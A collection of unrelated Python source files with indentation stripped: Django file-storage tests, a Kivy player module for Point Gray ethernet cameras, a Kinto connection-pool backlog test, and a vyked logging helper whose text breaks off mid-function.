while self.exists(name):
name = '.'.join([basename, str(number)] + ext)
number += 1
return name
class CustomStorageTests(FileStorageTests):
storage_class = CustomStorage
def test_custom_get_available_name(self):
first = self.storage.save('custom_storage', ContentFile('custom contents'))
self.assertEqual(first, 'custom_storage')
second = self.storage.save('custom_storage', ContentFile('more contents'))
self.assertEqual(second, 'custom_storage.2')
self.storage.delete(first)
self.storage.delete(second)
class UnicodeFileNameTests(unittest.TestCase):
def test_unicode_file_names(self):
"""
Regression test for #8156: files with unicode names I can't quite figure
out the encoding situation between doctest and this file, but the actual
repr doesn't matter; it just shouldn't return a unicode object.
"""
uf = UploadedFile(name='¿Cómo?',content_type='text')
self.assertEqual(type(uf.__repr__()), str)
# Tests for a race condition on file saving (#4948).
# This is written in such a way that it'll always pass on platforms
# without threading.
class SlowFile(ContentFile):
def chunks(self):
time.sleep(1)
return super(ContentFile, self).chunks()
class FileSaveRaceConditionTest(unittest.TestCase):
def setUp(self):
self.storage_dir = tempfile.mkdtemp()
self.storage = FileSystemStorage(self.storage_dir)
self.thread = threading.Thread(target=self.save_file, args=['conflict'])
def tearDown(self):
shutil.rmtree(self.storage_dir)
def save_file(self, name):
name = self.storage.save(name, SlowFile(b"Data"))
def test_race_condition(self):
self.thread.start()
name = self.save_file('conflict')
self.thread.join()
self.assertTrue(self.storage.exists('conflict'))
self.assertTrue(self.storage.exists('conflict_1'))
self.storage.delete('conflict')
self.storage.delete('conflict_1')
@unittest.skipIf(sys.platform.startswith('win'), "Windows only partially supports umasks and chmod.")
class FileStoragePermissions(unittest.TestCase):
def setUp(self):
self.umask = 0o027
self.old_umask = os.umask(self.umask)
self.storage_dir = tempfile.mkdtemp()
self.storage = FileSystemStorage(self.storage_dir)
def tearDown(self):
shutil.rmtree(self.storage_dir)
os.umask(self.old_umask)
@override_settings(FILE_UPLOAD_PERMISSIONS=0o654)
def test_file_upload_permissions(self):
name = self.storage.save("the_file", ContentFile("data"))
actual_mode = os.stat(self.storage.path(name))[0] & 0o777
self.assertEqual(actual_mode, 0o654)
@override_settings(FILE_UPLOAD_PERMISSIONS=None)
def test_file_upload_default_permissions(self):
fname = self.storage.save("some_file", ContentFile("data"))
mode = os.stat(self.storage.path(fname))[0] & 0o777
self.assertEqual(mode, 0o666 & ~self.umask)
class FileStoragePathParsing(unittest.TestCase):
def setUp(self):
self.storage_dir = tempfile.mkdtemp()
self.storage = FileSystemStorage(self.storage_dir)
def tearDown(self):
shutil.rmtree(self.storage_dir)
def test_directory_with_dot(self):
"""Regression test for #9610.
If the directory name contains a dot and the file name doesn't, make
sure we still mangle the file name instead of the directory name.
"""
self.storage.save('dotted.path/test', ContentFile("1"))
self.storage.save('dotted.path/test', ContentFile("2"))
self.assertFalse(os.path.exists(os.path.join(self.storage_dir, 'dotted_.path')))
self.assertTrue(os.path.exists(os.path.join(self.storage_dir, 'dotted.path/test')))
self.assertTrue(os.path.exists(os.path.join(self.storage_dir, 'dotted.path/test_1')))
def test_first_character_dot(self):
"""
File names with a dot as their first character don't have an extension,
and the underscore should get added to the end.
"""
self.storage.save('dotted.path/.test', ContentFile("1"))
self.storage.save('dotted.path/.test', ContentFile("2"))
self.assertTrue(os.path.exists(os.path.join(self.storage_dir, 'dotted.path/.test')))
self.assertTrue(os.path.exists(os.path.join(self.storage_dir, 'dotted.path/.test_1')))
class DimensionClosingBug(unittest.TestCase):
"""
Test that get_image_dimensions() properly closes files (#8817)
"""
@unittest.skipUnless(Image, "Pillow/PIL not installed")
def test_not_closing_of_files(self):
"""
Open files passed into get_image_dimensions() should stay opened.
"""
empty_io = BytesIO()
try:
get_image_dimensions(empty_io)
finally:
self.assertTrue(not empty_io.closed)
@unittest.skipUnless(Image, "Pillow/PIL not installed")
def test_closing_of_filenames(self):
"""
get_image_dimensions() called with a filename should closed the file.
"""
# We need to inject a modified open() builtin into the images module
# that checks if the file was closed properly if the function is
# called with a filename instead of an file object.
# get_image_dimensions will call our catching_open instead of the
# regular builtin one.
class FileWrapper(object):
_closed = []
def __init__(self, f):
self.f = f
def __getattr__(self, name):
return getattr(self.f, name)
def close(self):
self._closed.append(True)
self.f.close()
def catching_open(*args):
return FileWrapper(open(*args))
from django.core.files import images
images.open = catching_open
try:
get_image_dimensions(os.path.join(os.path.dirname(upath(__file__)), "test1.png"))
finally:
del images.open
self.assertTrue(FileWrapper._closed)
class InconsistentGetImageDimensionsBug(unittest.TestCase):
"""
Test that get_image_dimensions() works properly after various calls
using a file handler (#11158)
"""
@unittest.skipUnless(Image, "Pillow/PIL not installed")
def test_multiple_calls(self):
"""
Multiple calls of get_image_dimensions() should return the same size.
"""
from django.core.files.images import ImageFile
img_path = os.path.join(os.path.dirname(upath(__file__)), "test.png")
image = ImageFile(open(img_path, 'rb'))
image_pil = Image.open(img_path)
size_1, size_2 = get_image_dimensions(image), get_image_dimensions(image)
self.assertEqual(image_pil.size, size_1)
self.assertEqual(size_1, size_2)
@unittest.skipUnless(Image, "Pillow/PIL not installed")
def test_bug_19457(self):
"""
Regression test for #19457
get_image_dimensions fails on some pngs, while Image.size is working good on them
"""
img_path = os.path.join(os.path.dirname(upath(__file__)), "magic.png")
try:
size = get_image_dimensions(img_path)
except zlib.error:
self.fail("Exception raised from get_image_dimensions().")
self.assertEqual(size, Image.open(img_path).size)
class ContentFileTestCase(unittest.TestCase):
def setUp(self):
self.storage_dir = tempfile.mkdtemp()
self.storage = FileSystemStorage(self.storage_dir)
def tearDown(self):
shutil.rmtree(self.storage_dir)
def test_content_file_default_name(self):
self.assertEqual(ContentFile(b"content").name, None)
def test_content_file_custom_name(self):
"""
Test that the constructor of ContentFile accepts 'name' (#16590).
"""
name = "I can have a name too!"
self.assertEqual(ContentFile(b"content", name=name).name, name)
def test_content_file_input_type(self):
"""
Test that ContentFile can accept both bytes and unicode and that the
retrieved content is of the same type.
"""
self.assertIsInstance(ContentFile(b"content").read(), bytes)
if six.PY3:
self.assertIsInstance(ContentFile("español").read(), six.text_type)
else:
self.assertIsInstance(ContentFile("español").read(), bytes)
def test_content_saving(self):
"""
Test that ContentFile can be saved correctly with the filesystem storage,
both if it was initialized with string or unicode content"""
self.storage.save('bytes.txt', ContentFile(b"content"))
self.storage.save('unicode.txt', ContentFile("español"))
class NoNameFileTestCase(unittest.TestCase):
"""
Other examples of unnamed files may be tempfile.SpooledTemporaryFile or
urllib.urlopen()
"""
def test_noname_file_default_name(self):
self.assertEqual(File(BytesIO(b'A file with no name')).name, None)
def test_noname_file_get_size(self):
self.assertEqual(File(BytesIO(b'A file with no name')).size, 19)
class FileLikeObjectTestCase(LiveServerTestCase):
"""
Test file-like objects (#15644).
"""
available_apps = []
urls = 'file_storage.urls'
def setUp(self):
self.temp_dir = tempfile.mkdtemp()
self.storage = FileSystemStorage(location=self.temp_dir)
def tearDown(self):
shutil.rmtree(self.temp_dir)
def test_urllib2_urlopen(self):
"""
Test the File storage API with a file like object coming from urllib2.urlopen()
"""
file_like_object = urlopen(self.live_server_url + '/')
f = File(file_like_object)
stored_filename = self.storage.save("remote_file.html", f)
remote_file = urlopen(self.live_server_url + '/')
with self.storage.open(stored_filename) as stored_file:
self.assertEqual(stored_file.read(), remote_file.read())
|
__init__.py
|
"""PTGray based player
======================
This player can play Point Gray ethernet cameras using :mod:`pyflycap2`.
"""
from threading import Thread
from time import perf_counter as clock
from functools import partial
import time
from queue import Queue
from os.path import splitext, join, exists, isdir, abspath, dirname
from ffpyplayer.pic import Image
from kivy.clock import Clock
from kivy.properties import (
NumericProperty, ReferenceListProperty,
ObjectProperty, ListProperty, StringProperty, BooleanProperty,
DictProperty, AliasProperty, OptionProperty, ConfigParserProperty)
from kivy.uix.boxlayout import BoxLayout
from kivy.logger import Logger
from kivy.lang import Builder
from cpl_media.player import BasePlayer, VideoMetadata
from cpl_media import error_guard
try:
from pyflycap2.interface import GUI, Camera, CameraContext
except ImportError as err:
GUI = Camera = CameraContext = None
Logger.debug('cpl_media: Could not import pyflycap2: {}'.format(err))
__all__ = ('PTGrayPlayer', 'PTGraySettingsWidget')
class PTGrayPlayer(BasePlayer):
"""Wrapper for Point Gray based player.
"""
_config_props_ = (
'serial', 'ip', 'cam_config_opts', 'brightness', 'exposure',
'sharpness', 'hue', 'saturation', 'gamma', 'shutter', 'gain',
'iris', 'frame_rate', 'pan', 'tilt', 'mirror')
is_available = BooleanProperty(CameraContext is not None)
"""Whether ptgray is available to play."""
serial = NumericProperty(0)
'''The serial number of the camera to open. Either :attr:`ip` or
:attr:`serial` must be provided.
'''
serials = ListProperty([])
"""The serials of all the cams available.
This may only be set by calling :meth:`ask_config`, not set directly.
"""
ip = StringProperty('')
'''The IP address of the camera to open. Either :attr:`ip` or
:attr:`serial` must be provided.
'''
ips = ListProperty([])
"""The IPs of all the cams available.
This may only be set by calling :meth:`ask_config`, not set directly.
"""
cam_config_opts = DictProperty({'fmt': 'yuv422'})
'''The configuration options used to configure the camera after opening.
This are internal and can only be set by the internal thread once
initially set by config.
'''
active_settings = ListProperty([])
"""The list of settings that the camera can control.
This may only be set by calling :meth:`ask_config`, not set directly.
"""
brightness = DictProperty({})
"""The camera options for the brightness setting.
This may only be set by calling :meth:`ask_cam_option_config`, not
set directly.
"""
exposure = DictProperty({})
"""The camera options for the exposure setting.
This may only be set by calling :meth:`ask_cam_option_config`, not
set directly.
"""
sharpness = DictProperty({})
"""The camera options for the sharpness setting.
This may only be set by calling :meth:`ask_cam_option_config`, not
set directly.
"""
hue = DictProperty({})
"""The camera options for the hue setting.
This may only be set by calling :meth:`ask_cam_option_config`, not
set directly.
"""
saturation = DictProperty({})
"""The camera options for the saturation setting.
This may only be set by calling :meth:`ask_cam_option_config`, not
set directly.
"""
gamma = DictProperty({})
"""The camera options for the gamma setting.
This may only be set by calling :meth:`ask_cam_option_config`, not
set directly.
"""
shutter = DictProperty({})
"""The camera options for the shutter setting.
This may only be set by calling :meth:`ask_cam_option_config`, not
set directly.
"""
gain = DictProperty({})
"""The camera options for the gain setting.
This may only be set by calling :meth:`ask_cam_option_config`, not
set directly.
"""
iris = DictProperty({})
"""The camera options for the iris setting.
This may only be set by calling :meth:`ask_cam_option_config`, not
set directly.
"""
frame_rate = DictProperty({})
"""The camera options for the frame_rate setting.
This may only be set by calling :meth:`ask_cam_option_config`, not
set directly.
"""
pan = DictProperty({})
"""The camera options for the pan setting.
This may only be set by calling :meth:`ask_cam_option_config`, not
set directly.
"""
tilt = DictProperty({})
"""The camera options for the tilt setting.
This may only be set by calling :meth:`ask_cam_option_config`, not
set directly.
"""
mirror = BooleanProperty(False)
"""Whether the camera is mirrored. Read only.
"""
config_thread = None
"""The configuration thread.
"""
config_queue = None
"""The configuration queue.
"""
config_active_queue = ListProperty([])
"""The items currently being configured in the configuration thread.
"""
config_active = BooleanProperty(False)
"""Whether the configuration is currently active.
"""
_camera = None
ffmpeg_pix_map = {
'mono8': 'gray', 'yuv411': 'uyyvyy411', 'yuv422': 'uyvy422',
'yuv444': 'yuv444p', 'rgb8': 'rgb8', 'mono16': 'gray16le',
'rgb16': 'rgb565le', 's_mono16': 'gray16le', 's_rgb16': 'rgb565le',
'bgr': 'bgr24', 'bgru': 'bgra', 'rgb': 'rgb24', 'rgbu': 'rgba',
'bgr16': 'bgr565le', 'yuv422_jpeg': 'yuvj422p'}
"""Pixel formats supported by the camera and their :mod:`ffpyplayer`
equivalent.
"""
def __init__(self, open_thread=True, **kwargs):
self.active_settings = self.get_setting_names()
super(PTGrayPlayer, self).__init__(**kwargs)
if CameraContext is not None and open_thread:
self.start_config()
def do_serial(*largs):
self.ask_config('serial')
self.fbind('serial', do_serial)
def do_ip(*largs):
self.ask_config('serial')
self.fbind('ip', do_ip)
do_ip()
self.fbind('ip', self._update_summary)
self.fbind('serial', self._update_summary)
self._update_summary()
def _update_summary(self, *largs):
name = str(self.serial or self.ip)
self.player_summery = 'PTGray "{}"'.format(name)
def start_config(self, *largs):
"""Called by `__init__` to start the configuration thread.
"""
self.config_queue = Queue()
self.config_active_queue = []
thread = self.config_thread = Thread(
target=self.config_thread_run, name='Config thread')
thread.start()
self.ask_config('serials')
@error_guard
def stop_config(self, *largs, join=False):
"""Stops the configuration thread.
"""
self.ask_config('eof', ignore_play=True)
if join and self.config_thread:
self.config_thread.join()
self.config_thread = None
@error_guard
def ask_config(self, item, ignore_play=False):
"""Asks to read the config values of the item. E.g. ``'serials'``
for the list of serials or ``'gui'`` to show the PTGray GUI to the
user.
:param item: The request to send.
:param ignore_play: Whether to send it event if the camera is playing.
"""
if not ignore_play and self.play_state != 'none':
raise TypeError('Cannot configure while playing')
queue = self.config_queue
if queue is not None:
self.config_active = True
if item != 'eof':
# XXX: really strange bug, but somehow if this is set here when
# we call stop_all and we join, it blocks forever on setting
# can_play. Blocking only happens when kv binds to can_play.
# Makes no sense as it's all from the same thread???
self.can_play = False
self.config_active_queue.append(item)
queue.put(item)
def ask_cam_option_config(self, setting, name, value):
"""Asks to set the setting of the camera to a specific value.
:param setting: The setting, e.g. ``"brightness"``.
:param name: How to set it, e.g. ``"value"`` to set the value or
``'one push'`` to auto configure it.
:param value: The value to use to set it to.
"""
if not name or getattr(self, setting)[name] != value:
self.ask_config(
('option', (setting, name, value)), ignore_play=True)
def finish_ask_config(self, item, *largs, **kwargs):
"""Called in the kivy thread automatically after the camera
has been re-configured.
"""
if isinstance(item, tuple) and item[0] == 'option':
setting, _, _ = item[1]
getattr(self, setting).update(kwargs['values'])
set_rate = setting in ('frame_rate', 'metadata_play_used')
else:
for k, v in kwargs.items():
setattr(self, k, v)
set_rate = 'frame_rate' in kwargs or 'metadata_play_used' in kwargs
self.active_settings = self.get_active_settings()
if set_rate:
fmt, w, h, r = self.metadata_play_used
if 'max' in self.frame_rate:
r = max(r, self.frame_rate['max'])
self.metadata_play_used = VideoMetadata(fmt, w, h, r)
@error_guard
def _remove_config_item(self, item, *largs):
self.config_active_queue.remove(item)
if not self.config_active_queue:
self.config_active = False
self.can_play = True
def get_active_settings(self):
"""List of settings supported by the camera.
"""
settings = []
for setting in self.get_setting_names():
if getattr(self, setting).get('present', False):
settings.append(setting)
return list(sorted(settings))
def get_setting_names(self):
"""List of all settings potentially supported by a camera.
"""
return list(sorted((
'brightness', 'exposure', 'sharpness', 'hue', 'saturation',
'gamma', 'shutter', 'gain', 'iris', 'frame_rate', 'pan', 'tilt')))
def read_cam_option_config(self, setting, cam):
"""Reads the setting from the camera.
Called from the internal configuration thread.
"""
options = {}
mn, mx = cam.get_cam_abs_setting_range(setting)
options['min'], options['max'] = mn, mx
options['value'] = cam.get_cam_abs_setting_value(setting)
options.update(cam.get_cam_setting_option_values(setting))
return options
def write_cam_option_config(self, setting, cam, name, value):
"""Writes the setting to the camera.
Called from the internal configuration thread.
"""
if name == 'value':
cam.set_cam_abs_setting_value(setting, value)
else:
cam.set_cam_setting_option_values(setting, **{name: value})
if name == 'one_push' and value:
while cam.get_cam_setting_option_values(setting)['one_push']:
time.sleep(.2)
def write_cam_options_config(self, cam):
"""Writes all the settings as provided as properties of this instance
to the camera.
Called from the internal configuration thread.
"""
for setting in self.get_setting_names():
settings = getattr(self, setting)
cam.set_cam_setting_option_values(
setting, abs=settings.get('abs', None),
controllable=settings.get('controllable', None),
auto=settings.get('auto', None)
)
settings_read = cam.get_cam_setting_option_values(setting)
if settings_read['controllable'] and not settings_read['auto']:
if settings_read['abs'] and 'value' in settings:
cam.set_cam_abs_setting_value(setting, settings['value'])
elif not settings_read['abs'] and 'relative_value' in settings:
cam.set_cam_setting_option_values(
setting, relative_value=settings['relative_value'])
if cam.get_horizontal_mirror()[0]:
cam.set_horizontal_mirror(self.mirror)
def read_cam_options_config(self, cam):
"""Reads all the settings of this instance
to the camera.
Called from the internal configuration thread.
"""
for setting in self.get_setting_names():
Clock.schedule_once(partial(
self.finish_ask_config, None,
**{setting: self.read_cam_option_config(setting, cam)}))
if cam.get_horizontal_mirror()[0]:
Clock.schedule_once(partial(
self.finish_ask_config, None,
mirror=cam.get_horizontal_mirror()[1]))
def write_gige_opts(self, c, opts):
"""Writes the GIGE setting to the camera.
Called from the internal configuration thread.
"""
c.set_gige_mode(opts['mode'])
c.set_drop_mode(opts['drop'])
c.set_gige_config(opts['offset_x'], opts['offset_y'], opts['width'],
opts['height'], opts['fmt'])
c.set_gige_packet_config(opts['resend'], opts['timeout'],
opts['timeout_retries'])
c.set_gige_binning(opts['horizontal'], opts['vertical'])
def read_gige_opts(self, c):
"""Reads the GIGE setting from the camera.
Called from the internal configuration thread.
"""
opts = self.cam_config_opts
opts['drop'] = c.get_drop_mode()
opts.update(c.get_gige_config())
opts['mode'] = c.get_gige_mode()
opts.update(c.get_gige_packet_config())
opts['horizontal'], opts['vertical'] = c.get_gige_binning()
def config_thread_run(self):
"""The function run by the configuration thread.
"""
queue = self.config_queue
cc = CameraContext()
while True:
item = queue.get()
try:
if item == 'eof':
return
ip = ''
serial = 0
do_serial = False
if item == 'serials':
cc.rescan_bus()
cams = cc.get_gige_cams()
old_serial = serial = self.serial
old_ip = ip = self.ip
ips = ['.'.join(map(str, Camera(serial=s).ip))
for s in cams]
if cams:
if serial not in cams and ip not in ips:
serial = 0
ip = ''
elif serial in cams:
ip = ips[cams.index(serial)]
else:
serial = cams[ips.index(ip)]
Clock.schedule_once(partial(
self.finish_ask_config, item, serials=cams,
serial=serial, ips=ips, ip=ip))
if serial:
c = Camera(serial=serial)
c.connect()
if old_serial == serial or old_ip == ip:
self.write_gige_opts(c, self.cam_config_opts)
self.write_cam_options_config(c)
self.read_gige_opts(c)
self.read_cam_options_config(c)
if self.cam_config_opts['fmt'] not in \
self.ffmpeg_pix_map or \
self.cam_config_opts['fmt'] == 'yuv411':
self.cam_config_opts['fmt'] = 'rgb'
self.write_gige_opts(c, self.cam_config_opts)
c.disconnect()
c = None
elif item == 'serial':
do_serial = True
elif item == 'gui':
gui = GUI()
gui.show_selection()
do_serial = True # read possibly updated config
elif c or self._camera:
cam = c or self._camera
if isinstance(item, tuple) and item[0] == 'mirror':
if cam.get_horizontal_mirror()[0]:
cam.set_horizontal_mirror(item[1])
Clock.schedule_once(partial(
self.finish_ask_config, item,
mirror=cam.get_horizontal_mirror()[1]))
elif isinstance(item, tuple) and item[0] == 'option':
_, (setting, name, value) = item
if name:
self.write_cam_option_config(
setting, cam, name, value)
Clock.schedule_once(partial(
self.finish_ask_config, item,
values=self.read_cam_option_config(setting, cam)))
if do_serial:
_ip = ip = self.ip
serial = self.serial
if serial or ip:
if _ip:
_ip = list(map(int, _ip.split('.')))
c = Camera(serial=serial or None, ip=_ip or None)
serial = c.serial
ip = '.'.join(map(str, c.ip))
c.connect()
self.read_gige_opts(c)
self.read_cam_options_config(c)
if self.cam_config_opts['fmt'] not in \
self.ffmpeg_pix_map or \
self.cam_config_opts['fmt'] == 'yuv411':
self.cam_config_opts['fmt'] = 'rgb'
self.write_gige_opts(c, self.cam_config_opts)
c.disconnect()
c = None
if serial or ip:
opts = self.cam_config_opts
if opts['fmt'] not in self.ffmpeg_pix_map:
raise Exception('Pixel format {} cannot be converted'.
format(opts['fmt']))
if opts['fmt'] == 'yuv411':
raise ValueError('yuv411 is not currently supported')
metadata = VideoMetadata(
self.ffmpeg_pix_map[opts['fmt']], opts['width'],
opts['height'], 30.0)
Clock.schedule_once(partial(
self.finish_ask_config, item, metadata_play=metadata,
metadata_play_used=metadata, serial=serial, ip=ip))
except Exception as e:
self.exception(e)
finally:
Clock.schedule_once(partial(self._remove_config_item, item))
def play_thread_run(self):
process_frame = self.process_frame
c = None
ffmpeg_fmts = self.ffmpeg_pix_map
try:
ip = list(map(int, self.ip.split('.'))) if self.ip else None
c = Camera(serial=self.serial or None, ip=ip)
c.connect()
started = False
# use_rt = self.use_real_time
count = 0
ivl_start = 0
c.start_capture()
while self.play_state != 'stopping':
try:
c.read_next_image()
except Exception as e:
self.exception(e)
continue
if not started:
ivl_start = clock()
self.setattr_in_kivy_thread('ts_play', ivl_start)
Clock.schedule_once(self.complete_start)
started = True
self._camera = c
ivl_end = clock()
if ivl_end - ivl_start >= 1.:
real_rate = count / (ivl_end - ivl_start)
self.setattr_in_kivy_thread('real_rate', real_rate)
count = 0
ivl_start = ivl_end
count += 1
self.increment_in_kivy_thread('frames_played')
image = c.get_current_image()
pix_fmt = image['pix_fmt']
if pix_fmt not in ffmpeg_fmts:
raise Exception('Pixel format {} cannot be converted'.
format(pix_fmt))
ff_fmt = ffmpeg_fmts[pix_fmt]
if ff_fmt == 'yuv444p':
buff = image['buffer']
img = Image(
plane_buffers=[buff[1::3], buff[0::3], buff[2::3]],
pix_fmt=ff_fmt, size=(image['cols'], image['rows']))
elif pix_fmt == 'yuv411':
raise ValueError('yuv411 is not currently supported')
else:
img = Image(
plane_buffers=[image['buffer']], pix_fmt=ff_fmt,
size=(image['cols'], image['rows']))
process_frame(img, {'t': ivl_end})
except Exception as e:
self.exception(e)
finally:
self._camera = None
try:
c.disconnect()
finally:
Clock.schedule_once(self.complete_stop)
def stop_all(self, join=False):
self.stop_config(join=join)
super(PTGrayPlayer, self).stop_all(join=join)
class PTGraySettingsWidget(BoxLayout):
"""Settings widget for :class:`PTGrayPlayer`.
"""
settings_last = ''
"""The last name of the setting the GUI currently controls (i.e. one
of :meth:`PTGrayPlayer.get_active_settings`).
"""
opt_settings = DictProperty({})
"""The values for the settings currently being controlled in the GUI.
"""
player: PTGrayPlayer = None
"""The player.
"""
def __init__(self, player=None, **kwargs):
if player is None:
player = PTGrayPlayer()
self.player = player
super(PTGraySettingsWidget, self).__init__(**kwargs)
def _track_setting(self, *largs):
self.opt_settings = getattr(self.player, self.settings_last)
def bind_pt_setting(self, setting):
"""Tracks the setting currently selected in the GUI and auto-updates
when it changes.
"""
if self.settings_last:
self.player.funbind(self.settings_last, self._track_setting)
self.settings_last = ''
self.opt_settings = {}
if setting:
self.settings_last = setting
self.player.fbind(setting, self._track_setting)
self._track_setting()
Builder.load_file(join(dirname(__file__), 'ptgray_player.kv'))
|
test_storage_pool.py
|
import time
import threading
import unittest
from pyramid import testing
from kinto.core.testing import skip_if_no_postgresql
@skip_if_no_postgresql
class QueuePoolWithMaxBacklogTest(unittest.TestCase):
def setUp(self):
from kinto.core.storage.postgresql.client import create_from_config
self.connections = []
self.errors = []
config = testing.setUp(settings={
'pooltest_url': 'sqlite:///:memory:',
'pooltest_pool_size': 2,
'pooltest_pool_timeout': 1,
'pooltest_max_backlog': 2,
'pooltest_max_overflow': 1,
})
# Create an engine with known pool parameters.
# Use create_from_config() to make sure it is used by default
# and handles parameters.
client = create_from_config(config, prefix='pooltest_')
session = client.session_factory()
self.engine = session.get_bind()
def take_connection(self):
try:
self.connections.append(self.engine.connect())
except Exception as e:
self.errors.append(e)
def exhaust_pool(self):
# The size of the pool is two, so we can take
# two connections right away without any error.
self.take_connection()
self.take_connection()
# The pool allows an overflow of 1, so we can
# take another, ephemeral connection without any error.
self.take_connection()
self.assertEquals(len(self.connections), 3)
self.assertEquals(len(self.errors), 0)
def test_max_backlog_fails_when_reached(self):
self.exhaust_pool()
# The pool allows a backlog of 2, so we can
# spawn two threads that will block waiting for a connection.
thread1 = threading.Thread(target=self.take_connection)
thread1.start()
thread2 = threading.Thread(target=self.take_connection)
thread2.start()
self.assertEquals(len(self.connections), 3)
self.assertEquals(len(self.errors), 0)
# The pool is now exhausted and at maximum backlog.
# Trying to take another connection fails immediately.
t1 = time.time()
self.take_connection()
t2 = time.time()
self.assertEquals(len(self.connections), 3)
# This checks that it failed immediately rather than timing out.
self.assertTrue(t2 - t1 < 1.1)
self.assertTrue(len(self.errors) >= 1)
# And eventually, the blocked threads will time out.
thread1.join()
thread2.join()
self.assertEquals(len(self.connections), 3)
self.assertEquals(len(self.errors), 3)
def test_recreates_reinstantiate_with_same_pool_class(self):
from kinto.core.storage.postgresql.pool import QueuePoolWithMaxBacklog
pool = QueuePoolWithMaxBacklog(None, max_backlog=2, pool_size=2)
other = pool.recreate()
self.assertEqual(pool._pool.__class__, other._pool.__class__)
self.assertEqual(other._pool.max_backlog, 2)
|
log.py
|
from logging import Handler
from queue import Queue
from threading import Thread
import logging.config
import logging
import asyncio
import datetime
import yaml
import sys
import os
from git import Repo
from functools import partial, wraps
from pythonjsonlogger import jsonlogger
RED = '\033[91m'
BLUE = '\033[94m'
BOLD = '\033[1m'
END = '\033[0m'
_BRANCH_NAME = None
http_pings_logs_disabled = True
def get_current_working_repo():
branch_name = None
current_tag = None
try:
repo = Repo(os.getcwd())
branch = repo.active_branch
branch_name = branch.name
tags = repo.tags
if tags and isinstance(tags, list):
current_tag = tags[-1].name
except:
pass
return (branch_name, current_tag)
def http_ping_filter(record):
if "GET /ping/" in record.getMessage():
return 0
return 1
class LogFormatHelper:
LogFormat = '%a %l %u %t "%r" %s %b %D "%{Referrer}i" "%{User-Agent}i" %{X-Request-ID}o'
class CustomTimeLoggingFormatter(logging.Formatter):
def formatTime(self, record, datefmt=None): # noqa
"""
Overrides formatTime method to use datetime module instead of time module
to display time in microseconds. Time module by default does not resolve
time to microseconds.
"""
record.branchname = _BRANCH_NAME
if datefmt:
s = datetime.datetime.now().strftime(datefmt)
else:
t = datetime.datetime.now().strftime(self.default_time_format)
s = self.default_msec_format % (t, record.msecs)
return s
class CustomJsonFormatter(jsonlogger.JsonFormatter):
def __init__(self, *args, **kwargs):
self.extrad = kwargs.pop('extrad', {})
super().__init__(*args, **kwargs)
def add_fields(self, log_record, record, message_dict):
message_dict.update(self.extrad)
record.branchname = _BRANCH_NAME
super().add_fields(log_record, record, message_dict)
def patch_async_emit(handler: Handler):
base_emit = handler.emit
queue = Queue()
def loop():
while True:
record = queue.get()
try:
base_emit(record)
except:
print(sys.exc_info())
def async_emit(record):
queue.put(record)
thread = Thread(target=loop)
thread.daemon = True
thread.start()
handler.emit = async_emit
return handler
def patch_add_handler(logger):
base_add_handler = logger.addHandler
def async_add_handler(handler):
async_handler = patch_async_emit(handler)
base_add_handler(async_handler)
return async_add_handler
DEFAULT_CONFIG_YAML = """
# logging config
version: 1
disable_existing_loggers: False
handlers:
stream:
class: logging.StreamHandler
level: INFO
formatter: ctf
stream: ext://sys.stdout
stats:
class: logging.FileHandler
level: INFO
formatter: cjf
filename: logs/vyked_stats.log
exceptions:
class: logging.FileHandler
level: INFO
formatter: cjf
filename: logs/vyked_exceptions.log
service:
class: logging.FileHandler
level: INFO
formatter: ctf
filename: logs/vyked_service.log
formatters:
ctf:
(): vyked.utils.log.CustomTimeLoggingFormatter
format: '%(asctime)s - %(name)s - %(levelname)s - %(message)s'
datefmt: '%Y-%m-%d %H:%M:%S,%f'
cjf:
(): vyked.utils.log.CustomJsonFormatter
format: '{ "timestamp":"%(asctime)s", "message":"%(message)s"}'
datefmt: '%Y-%m-%d %H:%M:%S,%f'
root:
handlers: [stream, service]
level: INFO
loggers:
registry:
handlers: [service,]
level: INFO
stats:
handlers: [stats]
level: INFO
exceptions:
handlers: [exceptions]
level: INFO
"""
def setup_logging(_):
try:
with open('config_log.json', 'r') as f:
config_dict = yaml.load(f.read())
except:
config_dict = yaml.load(DEFAULT_CONFIG_YAML)
logging.getLogger('asyncio').setLevel(logging.WARNING)
logger = logging.getLogger()
logger.handlers = []
logger.addHandler = patch_add_handler(logger)
global _BRANCH_NAME
(branch_name, current_tag) = get_current_working_repo()
_BRANCH_NAME = branch_name
if 'handlers' in config_dict:
for handler in config_dict['handlers']:
if 'branch_name' in config_dict['handlers'][handler] and config_dict['handlers'][handler]['branch_name'] == True:
config_dict['handlers'][handler]['release'] = current_tag if current_tag else None
if 'tags' in config_dict['handlers'][handler] and isinstance(config_dict['handlers'][handler]['tags'], dict):
config_dict['handlers'][handler]['tags']['branch'] = branch_name if branch_name else None
logging.config.dictConfig(config_dict)
if http_pings_logs_disabled:
for handler in logging.root.handlers:
handler.addFilter(http_ping_filter)
def log(fn=None, logger=logging.getLogger(), debug_level=logging.DEBUG):
"""
logs parameters and result - takes no arguments
"""
if fn is None:
return partial(log, logger=logger, debug_level=debug_level)
@wraps(fn)
def func(*args, **kwargs):
arg_string = ""
for i in range(0, len(args)):
var_name = fn.__code__.co_varnames[i]
if var_name not in ['self', 'cls']:
arg_string += var_name + ":" + str(args[i]) + ","
arg_string = arg_string[0:len(arg_string) - 1]
string = (RED + BOLD + '>> ' + END + 'Calling {0}({1})'.format(fn.__name__, arg_string))
if len(kwargs):
string = (
RED + BOLD + '>> ' + END + 'Calling {0} with args {1} and kwargs {2}'.format(fn.__name__, arg_string,
kwargs))
logger.log(debug_level, string)
wrapped_fn = fn
if not asyncio.iscoroutine(fn):
wrapped_fn = asyncio.coroutine(fn)
try:
result = yield from wrapped_fn(*args, **kwargs)
string = BLUE + BOLD + '<< ' + END + 'Return {0} with result :{1}'.format(fn.__name__, result)
logger.log(debug_level, string)
return result
except Exception as e:
string = (RED + BOLD + '>> ' + END + '{0} raised exception :{1}'.format(fn.__name__, str(e)))
logger.log(debug_level, string)
raise e
return func
def logx(supress_args=[], supress_all_args=False, supress_result=False, logger=logging.getLogger(),
debug_level=logging.DEBUG):
"""
logs parameters and result
takes arguments
supress_args - list of parameter names to supress
supress_all_args - boolean to supress all arguments
supress_result - boolean to supress result
receiver - custom logging function which takes a string as input; defaults to logging on stdout
"""
def decorator(fn):
def func(*args, **kwargs):
if not supress_all_args:
arg_string = ""
for i in range(0, len(args)):
var_name = fn.__code__.co_varnames[i]
if var_name != "self" and var_name not in supress_args:
arg_string += var_name + ":" + str(args[i]) + ","
arg_string = arg_string[0:len(arg_string) - 1]
string = (RED + BOLD + '>> ' + END + 'Calling {0}({1})'.format(fn.__name__, arg_string))
if len(kwargs):
string = (
